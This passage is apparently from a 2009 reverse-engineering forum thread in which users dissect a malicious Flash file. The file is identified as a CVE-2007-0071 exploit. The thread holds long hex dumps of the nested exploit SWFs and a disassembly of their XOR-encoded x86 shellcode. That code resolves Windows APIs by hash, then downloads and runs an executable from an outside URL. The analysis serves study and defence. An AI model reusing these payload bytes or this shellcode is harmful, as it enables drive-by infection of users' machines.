B7FC390DB5783D0EFD6D6D6E6A6DC26B2DBEC53D483B573C6EC26B39BCF9293C3D3DFE073D4889C26B356C6BB64801B64913 453EC86BB64B1D3EC80EF4747C903EF80EE632832D07EB4935FCF6303EE77DD6CC062248DA63B663193EE05BB63176B66321 3EE0B639B63EF8966364FED5C2C3C2C2B37333D1A5C3B73343E5DF4E0EF7B7660B27124D4A776C4E3D5549494D0712124D52 594E5052494F5450135358491251525A125A58495845580F134D554D025459000C0F0E1B3D3D3D3D0D0D0F595C0B0E045C04 5C0D0B0D0D0D0D0D0D0D0D0D0F5E0C080D0E0C040E0D0D0D0C0D090D040D0D0D0D0D0D0D0D0C0A3D3EC342C22FFF1D3D570F 65873D3EC342C22FFF193D85CD3D3D3D0BB0691939F013FF293D85283C3D3DD63885223C3D3D873D3EC342C22FFF293D6F69 5739571D6AC26B2967FE6CB6780178B6611542703EE0B62E3EE80EF4747CB639B7B079153F5D0EF432832D07EB4935FCF43A 3EF77DD6CC04325C48DCB67E2D3EF8B639B59664FE6C6BB64801B64913453EC86BB64B1D3EC80EF4747C903EF80EE632832D 07EB4935FCF63A3EE77DD6CC062248DA63B663193EE05BB63176B663213EE0B639B63EF8966364FED5ABC0C2C20F49AC3104 DF40BE4404DBA5E775460044B2F15D239959D2CD754600A4D7AD80B4738722CC7018E870BC0D2CBDEB92A73D3D3D3D554949 4D0712124A4A4A1347505757574444135E531253584A125C08135E4E4E3D3D3DA4E16D2F4E83393F6EA0821C539B44A714A7 BF34B68D3DDE52EA0320C70AB1DEC858295092D77E8DEE1D5D9DF12DBBE08C4DB009E31D0029FC107EF8BB8F735441672895 1B4BACD4E7019CADC394A81599B48EA008200000000000000000000000000000000000000000000000000000000000000000 2043BF150C0000000100E59CBAE699AF20310000BF147F010000010000000010002E0000000010076E65775F666C610C4D61 696E54696D656C696E650D666C6173682E646973706C6179094D6F766965436C6970146E65775F666C613A4D61696E54696D 656C696E65066672616D6531000E6164644672616D65536372697074064F626A6563740C666C6173682E6576656E74730F45 76656E74446973706174636865720D446973706C61794F626A65637411496E7465726163746976654F626A65637416446973 706C61794F626A656374436F6E7461696E6572065370726974650716011603180517011607160A000B070102070204070406 07050807050907060B07020C07020D07020E07020F0400000000000000000000000000000000000101020803000201030100 0100000103010104010004000101090A03D0304700000102010A0B09F8628FFFFF0202024700000203010A0B0FD030D04900 5D04240060034F0402470000030201010927F86279F86275F8E82AFBFFFF00F82902F8637902020202020202020202020202 0202020202024700003F1319000000010000006E65775F666C612E4D61696E54696D656C696E650040000000000000006E65 775F666C612E4D61696E54696D656C696E65004000000073656F6920646B6C206A6866776C69337974726F262A262A28262A 28265E2423252423252423255E2A2628292A2829295F2A295F282A285E2A2678766E62786E62762076643567356834356436 20323178357A7838676673203431763578676667660000"

//80 0f 

_as3_coerce String

//63 0b 

_as3_setlocal <11>

//2c 37 

_as3_pushstring "4657530825060000300A00A0000C03034411080000004302FFFFFFC13F20BF0100040000AA0234D1F52513C8F123283D7FAD A171C3644EBFED5DD8328C1A62A6FE57740FFC7488E90BBA92BB4A6A9EADFD438815BA094B830B21632C09D4E5B9385EAB60 16B42E4436568A0BE3F24728883C31396B4894847DB29674BB005E9EF56D04A1E89F400982EDF2E64EACF1D4464536279CF3 5BD4316EFB0FBEEC77ED8AB213AE86288B7BC51F8DA0ADC9A8BFB10D2AC9279E02EAE536929FC03112279860648591038BC2 AA0D93B3B9C22359984591B4F7209F9EB0ED4A7203A5C0AD99ABF6C9402BF2EAACDFB0B94052D1759E2965909081EC000900 0060E80E000000906181C400090000FF71ECC20400E8000000005D83C514B98B010000B03D304500454975F9EB00ADADADAD ADADADADD4C13D3D3D62599C0D3D3D3D4531B67D31B64D2190B65535D634B67D09B07D41B65501B6CA573964D5B23D3D3DDF C45552533D3D55484F515069C22BB6D5D5443D3D3DB6EA7ABD023D48C77A6A7ABD023D48C7B6D2620EF4BCD1393C3D3DB6E1 6C6F6E55393C3D3DC26B3167646C6FB63F6E7EBD063D48C7BC46C113584558483EBED635B43EFA7E3913584558FB7E353D66 B7FC390DB5783D0EFD6D6D6E6A6DC26B2DBEC53D483B573C6EC26B39BCF9293C3D3DFE073D4889C26B356C6BB64801B64913 453EC86BB64B1D3EC80EF4747C903EF80EE632832D07EB4935FCF6303EE77DD6CC062248DA63B663193EE05BB63176B66321 3EE0B639B63EF8966364FED5C2C3C2C2B37333D1A5C3B73343E5DF4E0EF7B7660B27124D4A776C4E3D5549494D0712124D52 594E5052494F5450135358491251525A125A58495845580F134D554D025459000C0F0E1B3D3D3D3D0D0D0F595C0B0E045C04 5C0D0B0D0D0D0D0D0D0D0D0D0F5E0C080D0E0C040E0D0D0D0C0D090D040D0D0D0D0D0D0D0D0C0A3D3EC342C22FFF1D3D570F 65873D3EC342C22FFF193D85CD3D3D3D0BB0691939F013FF293D85283C3D3DD63885223C3D3D873D3EC342C22FFF293D6F69 5739571D6AC26B2967FE6CB6780178B6611542703EE0B62E3EE80EF4747CB639B7B079153F5D0EF432832D07EB4935FCF43A 3EF77DD6CC04325C48DCB67E2D3EF8B639B59664FE6C6BB64801B64913453EC86BB64B1D3EC80EF4747C903EF80EE632832D 07EB4935FCF63A3EE77DD6CC062248DA63B663193EE05BB63176B663213EE0B639B63EF8966364FED5ABC0C2C20F49AC3104 DF40BE4404DBA5E775460044B2F15D239959D2CD754600A4D7AD80B4738722CC7018E870BC0D2CBDEB92A73D3D3D3D554949 4D0712124A4A4A1347505757574444135E531253584A125C08135E4E4E3D3D3DA4E16D2F4E83393F6EA0821C539B44A714A7 BF34B68D3DDE52EA0320C70AB1DEC858295092D77E8DEE1D5D9DF12DBBE08C4DB009E31D0029FC107EF8BB8F735441672895 1B4BACD4E7019CADC394A815A6E18AA008200000000000000000000000000000000000000000000000000000000000000000 2043BF150C0000000100E59CBAE699AF20310000BF147F010000010000000010002E0000000010076E65775F666C610C4D61 696E54696D656C696E650D666C6173682E646973706C6179094D6F766965436C6970146E65775F666C613A4D61696E54696D 656C696E65066672616D6531000E6164644672616D65536372697074064F626A6563740C666C6173682E6576656E74730F45 76656E74446973706174636865720D446973706C61794F626A65637411496E7465726163746976654F626A65637416446973 706C61794F626A656374436F6E7461696E6572065370726974650716011603180517011607160A000B070102070204070406 07050807050907060B07020C07020D07020E07020F0400000000000000000000000000000000000101020803000201030100 0100000103010104010004000101090A03D0304700000102010A0B09F8628FFFFF0202024700000203010A0B0FD030D04900 5D04240060034F0402470000030201010927F56275F56271F5E82AFBFFFF00F52902F5637502020202020202020202020202 0202020202024700003F1319000000010000006E65775F666C612E4D61696E54696D656C696E650040000000000000006E65 775F666C612E4D61696E54696D656C696E6500400000005E265E262A262829295F2B5F2B2123407E21407E21402423405E24 252A282928295F28295F5F2A285E2A595425592A2628295F2B5F5F2B08085F2B5F295F2A265E2A2648474648474B6A6B6A7A 6866206B6A736661736766206766676667676771710000"

So, the secret is in there, please rip it apart for us.
evaluator
February 6th, 2009, 15:04
delta, IF you mean that HEXbytes, then i already decoded them into little SWFs,(read prev posts)
AND now about them i asked:
>>schizoM, is something intresting in that little decoded SWFs?

bcoz not seen there "x86 code", but those SWFs. OOKK!!??
dELTA
February 6th, 2009, 18:26
Ok Eval, since that post of yours was before schizoM took a look, I assumed that he looked at everything in it...

schizoM, can you find something interesting in the smaller SWFs in the "dec_swf.zip" file that Evaluator attached previously in this thread?

If there is indeed an exploit in any of the SWFs, there will be x86 code somewhere, even if it might be encrypted or obfuscated...
051r15
March 18th, 2009, 06:56
_as3_pushstring "4657530825060000300A00A0000C03034411080000004302FFFFFFC13F20BF0100040000AA0234D1F52513FC57827DEADFF6 7573821C12551D4AB55E20F86B68556E93CF5D71496916854753045F052AE712ED8C28084362A5F02C5EAC98F9A8A35E182A 90BAC4F02C0DF41511AA0AA1C2CCBFE5176E6FB340BC106E7D8E9CE83B9B3B859C67D00ABD135B14AA84C8BA502595AAF093 70DDD39F3532475EE985A5A7209F685D61F899C60A458E5330C2C69B862A677CD2D5990A657052CDADBFC004DAD8F2441F69 E35D81C48E3F666E2DB7A456417359F820F2D9977A69643AC1B8F337CC87E3E7958FB84F92B54352618165909081EC000900 0060E80E000000906181C400090000FF71ECC20400E8000000005D83C514B98B010000B03D304500454975F9EB00ADADADAD ADADADADD4C13D3D3D62599C0D3D3D3D4531B67D31B64D2190B65535D634B67D09B07D41B65501B6CA573964D5B23D3D3DDF C45552533D3D55484F515069C22BB6D5D5443D3D3DB6EA7ABD023D48C77A6A7ABD023D48C7B6D2620EF4BCD1393C3D3DB6E1 6C6F6E55393C3D3DC26B3167646C6FB63F6E7EBD063D48C7BC46C113584558483EBED635B43EFA7E3913584558FB7E353D66 B7FC390DB5783D0EFD6D6D6E6A6DC26B2DBEC53D483B573C6EC26B39BCF9293C3D3DFE073D4889C26B356C6BB64801B64913 453EC86BB64B1D3EC80EF4747C903EF80EE632832D07EB4935FCF6303EE77DD6CC062248DA63B663193EE05BB63176B66321 3EE0B639B63EF8966364FED5C2C3C2C2B37333D1A5C3B73343E5DF4E0EF7B7660B27124D4A776C4E3D5549494D0712124D52 594E5052494F5450135358491251525A125A58495845580F134D554D025459000C0F0E1B3D3D3D3D0D0D0F595C0B0E045C04 5C0D0B0D0D0D0D0D0D0D0D0D0F5E0C080D0E0C040E0D0D0D0C0D090D040D0D0D0D0D0D0D0D0C0A3D3EC342C22FFF1D3D570F 65873D3EC342C22FFF193D85CD3D3D3D0BB0691939F013FF293D85283C3D3DD63885223C3D3D873D3EC342C22FFF293D6F69 5739571D6AC26B2967FE6CB6780178B6611542703EE0B62E3EE80EF4747CB639B7B079153F5D0EF432832D07EB4935FCF43A 3EF77DD6CC04325C48DCB67E2D3EF8B639B59664FE6C6BB64801B64913453EC86BB64B1D3EC80EF4747C903EF80EE632832D 07EB4935FCF63A3EE77DD6CC062248DA63B663193EE05BB63176B663213EE0B639B63EF8966364FED5ABC0C2C20F49AC3104 DF40BE4404DBA5E775460044B2F15D239959D2CD754600A4D7AD80B4738722CC7018E870BC0D2CBDEB92A73D3D3D3D554949 4D0712124A4A4A1347505757574444135E531253584A125C08135E4E4E3D3D3DDCD0EAB8C29C5ED7F653B2213DC977CE6CA5 82C94105B66B6CE6A5A7D9E90CA4488F775B25340E4EC9774575784088E4CB980C4FE411E06F9C5EFBF07BEC43EAB38BD685 7285254EB5AB11678A37A815E1988AA008200000000000000000000000000000000000000000000000000000000000000000 2043BF150C0000000100E59CBAE699AF20310000BF147F010000010000000010002E0000000010076E65775F666C610C4D61 696E54696D656C696E650D666C6173682E646973706C6179094D6F766965436C6970146E65775F666C613A4D61696E54696D 656C696E65066672616D6531000E6164644672616D65536372697074064F626A6563740C666C6173682E6576656E74730F45 76656E74446973706174636865720D446973706C61794F626A65637411496E7465726163746976654F626A65637416446973 706C61794F626A656374436F6E7461696E6572065370726974650716011603180517011607160A000B070102070204070406 07050807050907060B07020C07020D07020E07020F0400000000000000000000000000000000000101020803000201030100 0100000103010104010004000101090A03D0304700000102010A0B09F8628FFFFF0202024700000203010A0B0FD030D04900 5D04240060034F0402470000030201010927F86275F86271F8E82AFBFFFF00F82902F8637502020202020202020202020202 0202020202024700003F1319000000010000006E65775F666C612E4D61696E54696D656C696E650040000000000000006E65 775F666C612E4D61696E54696D656C696E65004000000021295F285F292A265E262524464848446B696A61657366206A666A 786620793820776F647320666177663332317335363420326331337331642033663234647365743334353933385F282A265E 54255E255E257A6A68677366206A687366206A20200000"

This isn't shellcode, if you look at the first 3 bytes of hes you'll see its FWS in ascii which suggests its another flash file. Which launches a typical CVE-2007-0071 exploit.

The code selects which version of flash and launches the appropriate flash byte stream.
dELTA
March 19th, 2009, 10:37
Quote:
[Originally Posted by 051r15;79742]...if you look at the first 3 bytes of hes you'll see its FWS in ascii which suggests its another flash file. Which launches a typical CVE-2007-0071 exploit.
...which in turn would contain the shell code, yes?

Just because the most inner doll in one of those russian dolls is placed inside yet another doll, it doesn't mean that it's not still inside the most outer doll, you know...

Nice analysis though.
051r15
March 25th, 2009, 06:38
Yes dolls within dolls , the shell code starts at 0xfc

fc call 10f
10f call 114
114 pop ebp
115 add ebp, 14
118 mov ecx, 18b
11d mov al, 3d
11f xor [ebp+00], al
122 inc ebp
123 dec ecx
124 jnz 11f
... xor 0x3d section of memory 128-2B3
135 pop edi
136 mov eax, [fs:30] ; get a pointer to the Process Environment Block
13c js 4e
13e mov eax, [eax+0c] ;
141 mov esi, [eax+1c]
144 lodsd
145 mov ebp, [eax+08] ; get a pointer to Kernel32 pe structure
148 jmp 153
153 mov esi, edi
155 push 04
157 pop ecx
158 call f0

Uses the following function to look for the address in the dll of the functions based on a precomputed hash

1ec push ecx
1ed push esi
1ee mov esi, [ebp+3c]
1f1 mov esi, [ebp+esi+78]
1f5 add esi, ebp
1f7 push esi
1f8 mov esi, [esi+20]
1fb add esi, ebp
1fd xor ecx, ecx
1ff dec ecx
200 inc ecx
201 lodsd
202 add eax, ebp
204 xor ebx, ebx
206 movsx edx, byte ptr [eax]
209 cmp dl, dh
20b jz 215
20d ror ebx, 0d
210 add ebx, edx
212 inc eax
213 jmp 206

215 cmp ebx, [edi]
217 jnz 104
219 pop esi
21a mov ebx, [esi+24]
21d add ebx, ebp
21f mov cx, [ecx*2+ebx]
223 mov ebx, [esi+1c]
226 add ebx, ebp
228 mov eax, [ecx*4+ebx]
22b add eax, ebp
22d stosd
22e pop esi
22f pop ecx
230 retn

Pseudo code of downloader

URLMON = KERNEL32.DLL.LoadLibraryA(urlmon)
KERNEL32.DLL.GetTempPathA(260, tmp_file)
URLMON.URLDownloadToFileA(0, "http://firstgate.ru/stat/getexe2.php?id=123&0","tmp_file", 0, 0)
KERNEL32.DLL.WinExec("tmp_file", 1)
evaluator
March 26th, 2009, 13:29
wow, you showed it, thank you!
probably code starts at offset FB:

000000FB: 60 pushad
000000FC: E80E000000 call 00000010F
00000101: 90 nop
00000102: 61 popad
00000103: 81C400090000 add esp,000000900
00000109: FF71EC push d,[ecx-014]
0000010C: C20400 retn 4